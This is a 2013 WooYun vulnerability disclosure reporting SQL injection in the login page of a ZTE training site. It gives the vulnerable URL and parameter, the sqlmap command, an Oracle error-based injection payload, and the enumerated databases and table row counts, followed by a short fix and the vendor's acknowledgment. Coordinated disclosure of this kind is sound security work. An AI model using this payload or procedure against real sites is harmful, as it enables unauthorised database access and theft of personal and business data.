当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-042708

漏洞标题:中兴知识分站SQL注入漏洞

相关厂商:中兴通讯股份有限公司

漏洞作者: Mutoubug

提交时间:2013-11-12 18:48

修复时间:2013-12-27 18:48

公开时间:2013-12-27 18:48

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-11-12: 细节已通知厂商并且等待厂商处理中
2013-11-13: 厂商已经确认,细节仅向厂商公开
2013-11-23: 细节向核心白帽子及相关领域专家公开
2013-12-03: 细节向普通白帽子公开
2013-12-13: 细节向实习白帽子公开
2013-12-27: 细节向公众公开

简要描述:

中兴手机不错。。

详细说明:

存在问题的页面:http://univ.zte.com.cn:80/ztetrain/login.aspx
只要提交用户名admin' 密码随意就可以看到报错。

zte1.jpg


然后抓包到SQLMAP里面跑,出现漏洞的参数是TextID,要加上这个 --ignore-proxy参数,不然跑不出数据来。
sqlmap语句:sqlmap.py -r ztepost.txt -p TextID --dbs --dbms "Oracle" --ignore-proxy
下面是跑到的表:
sqlmap identified the following injection points with a total of 61 HTTP(s) requests:
---
Place: POST
Parameter: TextID
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJOTY4NzU3MjQ5D2QWAmYPZBYCAgEPD2QWAh4HT25DbGljawUOc3VibWl0Rm9ybSgpOyBkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQZJbWFnZTFRH0RDXoSQjdJbKgeO6B2jmWCSjQ==&__EVENTVALIDATION=/wEWBAK47NXJCwL7k7GyCgLf2eqGAwKOrcejAxeZaRn9jJujrH6YeC8apWdp5DBm&TextID=admin' AND 6453=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(121)||CHR(113)||CHR(108)||CHR(113)||(SELECT (CASE WHEN (6453=6453) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(99)||CHR(109)||CHR(119)||CHR(113)||CHR(62))) FROM DUAL) AND 'bjlR'='bjlR&Image1.x=23&Image1.y=29&TextPwd=admin
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle
available databases [12]:
[*] CTXSYS
[*] ELEARNING
[*] EMPTRAIN
[*] EUNIV
[*] EVALCENTER
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] SYS
[*] SYSTEM
[*] XSEXAM
[*] ZTETRAIN
然后跑一个数据库看看数据量有多少:
Database: ZTETRAIN
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| BASE_LOGIN_LOG | 6168211 |
| SYS_ERROR_LOG | 2857664 |
| USER_MSGBOX | 1441271 |
| SSO_LOGIN | 932749 |
| SSO_LOGIN_IUBAK | 910223 |
| BASE_UESRINFO | 885013 |
| SSO_INFO | 729583 |
| SYS_LOGIN_LOG | 697071 |
| NEWS_OBSERVATION_INFO | 461343 |
| SSO_LOGIN_BAK | 433714 |
| BASE_STUDENT_INFO | 374811 |
| BASE_USERINFO | 331903 |
| SSO_INFO_TMP | 172810 |
| SSO_INFO_TMP_IUBAK | 172810 |
| EMPINFO_FORUPDATE | 125084 |
| SSO_INFO_BAK | 122411 |
| SYS_ERROR_LOG_BAK | 120306 |
| BASE_STUDENT_INFO_0115 | 85289 |
| BASE_STUDENT_INFO_1230 | 84727 |
| BASE_STU_ORDER_DOCS | 69043 |
| CT_APPLY_HANDLE | 65058 |
| BASE_HAS_INFO | 63543 |
| BBS_OUT_USERS | 52754 |
| TEST_GU | 50001 |
| TEST_INT | 50001 |
| EMP_TEMP | 47765 |
| TRAIN_APPLY | 46726 |
| TRAIN_APPLY_DITRIBUTE | 41691 |
| BASE_STU_ORDER_DOCS_IUBAK | 40927 |
| SYS_HOT_SEARCH | 40058 |
| BASE_CONTRACT_INFO | 39272 |
| OLD_MIS_USER | 38738 |
| MIS_USER_914 | 38562 |
| BASE_STUD_HANDATE_LOG | 36431 |
| BASE_STUDENT_INFO_0310 | 36237 |
| MIS_STUDENT | 34413 |
| BASE_GROUP_INFO_T | 33382 |
| ZTESPT_CUSTOMERUSER | 31966 |
| MAIL_PRAMS | 31594 |
| ERP_CONTRACT_INFO_SYN | 31307 |
| EC | 30436 |
| ET | 30433 |
| PUBLIC_OPERATE_LOG | 29518 |
| UAM_SYNC_RIGHT_DATA | 29362 |
| LOCALTRAINCLASSPLACE | 28202 |
| TRAIN_APPLY_IUBAK | 27827 |
| ERP_CUSTOMERS_T | 26163 |
| TRAIN_PLAN_CLASS | 25335 |
| UAM_SYNC_RIGHT_DATA_IUBAK | 25028 |
| BASE_CLASS_INFO | 24485 |
| BASE_STUDENT_INFO_812 | 23753 |
| BASE_CLASS_INFOBAK1214 | 21754 |
| BASE_CONTRACT_INFO0504 | 21161 |
| BASE_CONTRACT_INFO_BAK0430 | 21144 |
| BASE_CONTRACT_INFO_BAK0422 | 20962 |
| BBS_OUT_USERS_IUBAK | 20891 |
| CLASS_ADDRESS_T | 20787 |
| BASE_CONTRACT_INFO2_MYP | 20579 |
| ERP_CONTRACT_INFO0930 | 20575 |
| ERP_CONTRACT_INFO0901 | 20343 |
| TRAIN_APLLY_SUM | 18151 |
| TRAIN_COURSE_PLAN_DETAIL | 17913 |
| TRAIN_COURSE_PLAN_DETAIL_IUBAK | 17811 |
| ERP_CONTRACT_INFO_SYN_TMP | 17596 |
| TRAIN_COURSE_PLAN_TEACHER | 17260 |
| PUBLIC_OPERATE_LOG_IUBAK | 17242 |
| TRAIN_COURSE_PLAN_TEACHER_IUBA | 17189 |
| NEWS_INFORMATION | 16911 |
| STUDENT_LEADER_INFO | 16307 |
| APPLY_PACT_STOP | 14506 |
| SPECIAL_CONTRACT_INFO | 14386 |
| NEWS_T | 13968 |
| TRAIN_PLAN_CLASS_IUBAK | 12605 |
| FORUM_USERS | 12246 |
| FORUM_USERS_IUBAK | 12245 |
| BASE_CLASS_INFO_IUBAK | 12036 |
| PLAN_UPDATE_LOG | 10173 |
| TRAIN_COURSE_PLAN_TEACHER_BAK | 9232 |
| BASE_COURSE_INFO | 9022 |
| BASE_COURSE_INFO_IUBAK | 8993 |
| TRAIN_COURSE_PLAN_DETAIL_BAK | 8758 |
| SPECIAL_CONTRACT_INFO_IUBAK | 8329 |
| RES_CLASSROOM_USE | 8195 |
| RES_CLASSROOM_USE_IUBAK | 8148 |
| TRAIN_PLAN_TEMPLATE_DETAIL | 8012 |
| TRAIN_PLAN_TEMPLATE_DETAIL_IUB | 7913 |
| NEWS_INFORMATION_BAK | 7832 |
| SSO_INFO_USER_TMP | 7786 |
| BASE_DOCS_STU_INFO | 7499 |
| USER_RIGHTS | 7465 |
| MIS_PACT_914 | 7398 |
| OLD_MIS_CONTRACT | 7231 |
| MIS_CONTRACT | 7013 |
| TEMP | 6925 |
| USER_RIGHTS_IUBAK | 6672 |
| SYS_PERSONAL_SETTING | 6630 |
| BASE_DOCS_EXTEND | 5954 |
| CONTRACT_INFO | 4999 |
| TRAINMANAGELIST_IUBAK | 4242 |
| PLAN_UPDATE_LOG_IUBAK | 4196 |
| BBS_APPLY_POSTS | 4085 |
| TRAIN_GIVEUP_LOG | 4017 |
| RAOZULAN | 3874 |
| TRAIN_APPLY_2 | 3635 |
| SYS_PERSONAL_SETTING_IUBAK | 3547 |
| LOG_CONTRACT_REC | 3428 |
| FEE_UPDATE_LOG | 3420 |
| BASE_CITY_INFO | 3409 |
| BBS_REPLY | 3231 |
| SPECIAL_CONTRACT_AUDIT | 3171 |
| TRAIN_GIVEUP_LOG_IUBAK | 2841 |
| BASE_TEACHER_INFO | 2782 |
| BBS_REPLY_IUBAK | 2701 |
| LOG_CONTRACT_REC_IUBAK | 2446 |
| TEMP_USER | 2429 |
| BBS_APPLY_POSTS_IUBAK | 2019 |
| BASE_TRAINVERSION_DEFINE | 1999 |
| MIS_CONTRACT_BASE | 1911 |
| BASE_TEACHER_INFO_IUBAK | 1849 |
| TEXT_IMPORT | 1756 |
| BASE_OPERATORS | 1670 |
| ELT_TYPE_COURSE | 1596 |
| ERP_PRODUCT_INFO | 1574 |
| CLASSGRADENOTES | 1555 |
| ELT_COURSE_CHAPTER_070711 | 1506 |
| FORUM_INFO | 1496 |
| FORUM_INFO_IUBAK | 1496 |
| OLD_MIS_PLAN | 1465 |
| MIS_PLAN_914 | 1455 |
| STUDENT_LEADER_INFO_0310 | 1436 |
| BASE_TRAINVERSION_DEFINE2 | 1372 |
| BASE_TRAINVERSION_DEFINEBAK | 1372 |
| ELT_COURSE_INFO_070711 | 1369 |
| PL_CONFIGURATION_TEMPLATE | 1280 |
| PL_CONFIGURATION_TEMPLATE_TEMP | 1280 |
| MIS_CLASS | 1237 |
| BASE_TRAINVERSION_DEFINE_IUBAK | 1148 |
| ERP_PRODUCT_INFOBAK0309 | 1125 |
| BASE_TRAINVERSION_DEFINE1 | 1067 |
| BASE_CUSTOMER_INFO | 1044 |
| ERP_PRODUCT_INFO0309 | 1029 |
| BASE_TRAINVERSION_DEFINE_BAK12 | 1018 |
| USER_RIGHT_GROUP_DETAIL_IUBAK | 988 |
| BASE_CLASS_COURSE_PLAN | 984 |
| BASE_OPERATION_LOG | 975 |
| BASE_CLASS_COURSE_PLAN_IUBAK | 971 |
| BAK_OLD_COLLECT_CLASS | 859 |
| BBS_FILES | 837 |
| ERP_PRODUCT_INFO_BAK0525 | 820 |
| BBS_POSETS | 811 |
| BASE_APPROVE_LOG | 769 |
| TRAINED_ERROR_CONTRACT1 | 753 |
| ERP_CONTRACT_INFO0810 | 746 |
| BASE_HAS_ORG | 719 |
| BBS_POSTS_FILE | 617 |
| BASE_REGIONCITY_INFO | 555 |
| TMP_MONTH_TRAINED_COUNT | 535 |
| BASE_ERPHR_DEPT | 532 |
| USER_TTT | 516 |
| BASE_ANNUALLYPLAN | 504 |
| TRAINMANAGELIST | 504 |
| BASE_ERPHR_DEPT0110 | 474 |
| BASE_ERPHR_DEPT0506 | 474 |
| BASE_ERPHR_DEPT_BAK0804 | 470 |
| SYS_PAGE_CONFIG | 464 |
| SSO_ELEARNING | 460 |
| SSO_ELEARNING_IUBAK | 460 |
| USER_RIGHT_GROUP_DETAIL | 460 |
| TRAINMANAGELIST_BAK | 444 |
| BBS_POSETS_IUBAK | 426 |
| USER_RIGHT_GROUP_RIGHT | 416 |
| SYS_PAGE_CONFIG_TMP | 411 |
| BASE_DICTIONARIES | 405 |
| BASE_ERPHR_DEPT_BAK0224 | 405 |
| MENUINFO | 403 |
| MENUINFOBAK | 403 |
| TRAIN_PLAN_TEMPLATE | 391 |
| DIM_SALESDEPT_REGION | 384 |
| TRAIN_PLAN_TEMPLATE_IUBAK | 378 |
| BBS_POSTS | 350 |
| EXAM_TYPE_DIC | 310 |
| BBS_FILES_IUBAK | 271 |
| RM_SOLUTIONS | 263 |
| BASE_NATION_INFO | 246 |
| BASE_NATION_REGION | 245 |
| TEMP_LOG | 244 |
| BASE_DICTIONARIES_IUBAK | 232 |
| ELT_COURSE_CHAPTER | 216 |
| ELT_COURSE_INFO | 216 |
| ELT_COURSE_INFO_IUBAK | 216 |
| BBS_POSTS_IUBAK | 200 |
| RESERVEAPPLYPACTMANAGE_050718 | 194 |
| NEWS_CLASS_DIC | 187 |
| RM_APPLY_INFO | 180 |
| SUPPORT_NATION | 174 |
| TRACFICINFO | 174 |
| TRACFICINFO_IUBAK | 174 |
| PRINT_BY_CLASS_APPLY | 171 |
| TMP_MAIL | 170 |
| OUTSOURCING_AREA_DETAIL | 169 |
| BASE_ROLE_USER | 166 |
| BASE_ERPHR_DEPT_EN | 162 |
| BAK_TMPMULTIINPUT | 154 |
| BAK_TMPMULTIINPUT_2 | 154 |
| USER_TMP | 152 |
| TRAINED_ERROR_CONTRACT | 149 |
| PL_APPLY_BASE | 147 |
| SENDMAIL_EMP_LIST_IUBAK | 143 |
| PL_APPLY_DEVICE | 138 |
| QUERY_PARAMENTS | 136 |
| BASE_PRODUCT_TYPE | 130 |
| PL_COURSES_MODULE | 129 |
| RESERVEAPPLYPACTMANAGE | 112 |
| BBS_POSTS_FILE_IUBAK | 111 |
| NEWS_CLASS_DIC_IUBAK | 110 |
| ELT_COURSE_TYPE | 107 |
| USER_ROLEMANAGE_INFO | 107 |
| SYSUPDATELOG | 106 |
| ZTE_UNIV_OWN_CONTRACT | 104 |
| BASE_PROJECT | 101 |
| BASE_PRODUCT_TYPE1 | 96 |
| BASE_PRODUCT_TYPEBAK | 96 |
| USER_ROLEMANAGE_INFO_IUBAK | 95 |
| FORUM_BOARD_AUTH | 94 |
| FORUM_BOARD_AUTH_IUBAK | 94 |
| TEMP_PLAN | 93 |
| HR_DEPT_CHANGE | 89 |
| BASE_STUDENT_TEMP | 82 |
| SENDMAIL_EMP_LISTBAK | 81 |
| LOG_CONTRACT_HISREC | 78 |
| USER_RIGHTS_DESC | 77 |
| NEWS_TEMP | 68 |
| SYS_SYSTEM_CONFIG | 67 |
| SYS_SYSTEM_CONFIG_1008 | 67 |
| BASE_CLASS_TEACHER | 66 |
| SENDMAIL_EMP_LIST | 65 |
| PL_APPLY_MATERIAL | 62 |
| PLANMANAGELIST_IUBAK | 62 |
| SYS_MONTH_VISIT | 62 |
| BASE_PRODUCT_TYPE_BAK0525 | 61 |
| PL_PLAN_INFO_DETAIL | 61 |
| PL_APPLY_BASE_SUM | 60 |
| BASE_CLASS_TEACHER_IUBAK | 59 |
| PL_PLAN_INFO | 54 |
| CUSTOMER_APPLY | 52 |
| CUSTOMER_APPLY_IUBAK | 52 |
| USER_RIGHT_GROUP | 52 |
| BASE_TEACHDEPT_DIC | 51 |
| BASE_STUDENT_INFO1 | 50 |
| BASE_TEACHDEPT_DIC2 | 50 |
| USER_RIGHTS_DESC_IUBAK | 49 |
| BASE_TEACHDEPT_DICBAK | 46 |
| RES_CLASSROOM_INFO | 46 |
| RES_CLASSROOM_INFO_IUBAK | 46 |
| USER_RIGHT_GROUP_IUBAK | 46 |
| PL_COURSES_MODULE_NEW | 45 |
| BASE_TEACHDEPT_DIC_IUBAK | 43 |
| SPECIFIC_USERMANAGER | 43 |
| SPECIFIC_USERMANAGER_IUBAK | 43 |
| BASE_STUDENT_INFO2 | 41 |
| BASE_PLACE_INFO | 39 |
| INVITATION_LETTER_TEMPLATE | 36 |
| BASE_PLACE_INFOBAK | 33 |
| INVITATION_LETTER_TEMPLATE1 | 33 |
| QUERY_RIGHT | 32 |
| QUERY_RIGHT_IUBAK | 32 |
| QUERY_SQL | 32 |
| BASE_PROVINCE_INFO | 31 |
| BASE_PROVINCE_REGION | 31 |
| VARIABLE_DESCRIPTION | 30 |
| ERP_TRAIN_TYPE | 29 |
| NOT_VALID_TYPE | 29 |
| OUTER_USER_INFO | 28 |
| ERP_CUSTOMER_CATEGORY | 27 |
| PL_APPLY_SOLUTION | 27 |
| PL_PLAN_MANAGERS | 27 |
| PRODUCT_TYPE_CHANGE | 27 |
| CF_TRAINVERSION_DEFINE | 26 |
| MENUINFO4FORUM | 24 |
| MV_REGION_DIM | 23 |
| RM_COURSES_DIST | 23 |
| SYS_MENU | 23 |
| TEMP_USER_GROUP | 23 |
| SYS_MENU_BAK | 22 |
| FORUM_USERS_CLASS | 21 |
| OUTSOURCINGAREADIC | 21 |
| PL_APPLY_SOLUTION_DISTRIBUTE | 20 |
| RM_COURSES_TRACE | 20 |
| HRT_TMP_EMPLOYEEBASE_INFO | 18 |
| TRAIN_TYPE_TARGET | 16 |
| BASE_ERPDEPT_FOREIGNLIST | 14 |
| BEF | 14 |
| MENUINFO4NEWS | 14 |
| FORUM_BOARD_MASTER_INSTR_IUBAK | 13 |
| FORUM_BOARD_MASTER_INSTRUCTION | 13 |
| PLANMANAGELIST | 13 |
| BASE_LESSONLANG_DIC | 12 |
| PL_SITUATION_INFO | 12 |
| STUDENT_LEADER_INFO_BAK | 12 |
| BBS_BOARD | 11 |
| BBS_BOARD_IUBAK | 11 |
| CUSTOMER_STUDENT_INFO | 11 |
| USER_RIGHTS_TYPE | 11 |
| BASE_PRODUCT_SYMBOL | 10 |
| FORUM_BOARD_T | 10 |
| FORUM_BOARD_T_IUBAK | 10 |
| PL_DEVICE_ADMIN | 9 |
| VOTE_TYPE_DIC | 9 |
| VOTE_TYPE_DIC_IUBAK | 9 |
| WFT_TEMPLATE_GRAPHICS | 9 |
| BBS_POSTS_TYPE_DIC | 8 |
| DIC_GROUPFLAG | 8 |
| HOME_BLOCK_SEQINFO | 8 |
| MANAGE_TRAIN_TEACHER | 8 |
| QUEST_PAPER_DETAIL | 7 |
| TRAIN_COURSE_PLAN_PLAY | 7 |
| TRAIN_COURSE_PLAN_PLAY_IUBAK | 7 |
| TRAIN_RULE_INFO | 7 |
| FORUM_CLASS | 6 |
| QUEST_FEEDBACK | 6 |
| QUEST_FEEDBACK_DETAIL | 6 |
| QUEST_FEEDBACK_IUBAK | 6 |
| QUEST_STATE_DIC | 6 |
| SENDMAIL_BUSINESS_LIST | 6 |
| BBS_COMMUNITY | 5 |
| BBS_COMMUNITY_IUBAK | 5 |
| DT_SALES | 5 |
| HRT_OUTERUSER_INFO | 5 |
| PL_COURSES_STUDY_FEEDBACK | 5 |
| QUEST_QUESTION | 5 |
| QUEST_QUESTION_IUBAK | 5 |
| QUEST_SAMPLE_LIST | 5 |
| QUEST_SAMPLE_LIST_IUBAK | 5 |
| SNEDMAIL_ROLE_LIST | 5 |
| TEST | 5 |
| UNIONFEEDEFINE | 5 |
| BBS_POSTS_TYPE | 4 |
| BBS_POSTS_TYPE_IUBAK | 4 |
| DISTRIBUTED_DEPLOY_INFO | 4 |
| PL_COURSES_STUDY | 4 |
| QUEST_PAPER | 4 |
| QUEST_PAPER_IUBAK | 4 |
| QUEST_PAPER_SAMPLE | 4 |
| QUEST_PAPER_SAMPLE_IUBAK | 4 |
| QUEST_SAMPLE_DEFINE | 4 |
| QUEST_SAMPLE_DEFINE_IUBAK | 4 |
| SYS_MAIL_QUEUE | 4 |
| SYS_SYSTEM_INFO | 4 |
| TRAIN_TYPE_COURSE_INFO | 4 |
| BASE_COURSE_DEFINE | 3 |
| BASE_COURSE_PLAN_AUDIT | 3 |
| BASE_COURSE_PLAN_AUDIT_IUBAK | 3 |
| BASE_COURSETYPE_DIC | 3 |
| BASE_WORKROLE_DIC | 3 |
| OUTSOURCINGSALEDIC | 3 |
| QUERY_MAIL | 3 |
| QUERY_MAIL_DATA | 3 |
| QUEST_TWOTYPE_DIC | 3 |
| SYS_MAIL_DATA | 3 |
| SYS_MAIL_SETUP | 3 |
| SYS_MAIL_SETUP1 | 3 |
| TRAIN_TEACH_TIME_SETUP | 3 |
| BASE_CUSTOMER_USER | 2 |
| ERP_CUSTOMERS_INFO | 2 |
| QUEST_ONETYPE_DIC | 2 |
| SYS_LANGUAGE_VER | 2 |
| BASE_LOGIN_INFO | 1 |
| BASE_STU_CUSTOM | 1 |
| BBS_PARAMETERS | 1 |
| BBS_USER_LIST | 1 |
| COMMONUSER | 1 |
| FORUM_CONFIG | 1 |
| FORUM_INSTRUCTION | 1 |
| FORUM_ONLINE | 1 |
| FORUM_USERS_CONFIG | 1 |
| NEWS_SET | 1 |
| RES_CLASSROOM_PLACE | 1 |
| RES_CLASSROOM_PLACE_IUBAK | 1 |
| SCHOOLMANAGER | 1 |
| STEP_TRAIN_APPLY | 1 |
| SYS_UPDATE | 1 |
+--------------------------------+---------+
这也不会少吧。。其他数据库就没跑了。。

漏洞证明:

sqlmap identified the following injection points with a total of 61 HTTP(s) requests:
---
Place: POST
Parameter: TextID
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJOTY4NzU3MjQ5D2QWAmYPZBYCAgEPD2QWAh4HT25DbGljawUOc3VibWl0Rm9ybSgpOyBkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQZJbWFnZTFRH0RDXoSQjdJbKgeO6B2jmWCSjQ==&__EVENTVALIDATION=/wEWBAK47NXJCwL7k7GyCgLf2eqGAwKOrcejAxeZaRn9jJujrH6YeC8apWdp5DBm&TextID=admin' AND 6453=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(121)||CHR(113)||CHR(108)||CHR(113)||(SELECT (CASE WHEN (6453=6453) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(99)||CHR(109)||CHR(119)||CHR(113)||CHR(62))) FROM DUAL) AND 'bjlR'='bjlR&Image1.x=23&Image1.y=29&TextPwd=admin
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle
available databases [12]:
[*] CTXSYS
[*] ELEARNING
[*] EMPTRAIN
[*] EUNIV
[*] EVALCENTER
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] SYS
[*] SYSTEM
[*] XSEXAM
[*] ZTETRAIN

zte2.jpg

修复方案:

1.过滤TextID参数。
2.如果页面没有就删掉吧。。

版权声明:转载请注明来源 Mutoubug@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2013-11-13 08:52

厂商回复:

感谢 Mutoubug 对我司网站安全的关注,相关问题已经转交至我司相关部门处理。关于该问题的最新进展,将会第一时间通知您,谢谢!

最新状态:

暂无


漏洞评价:

评论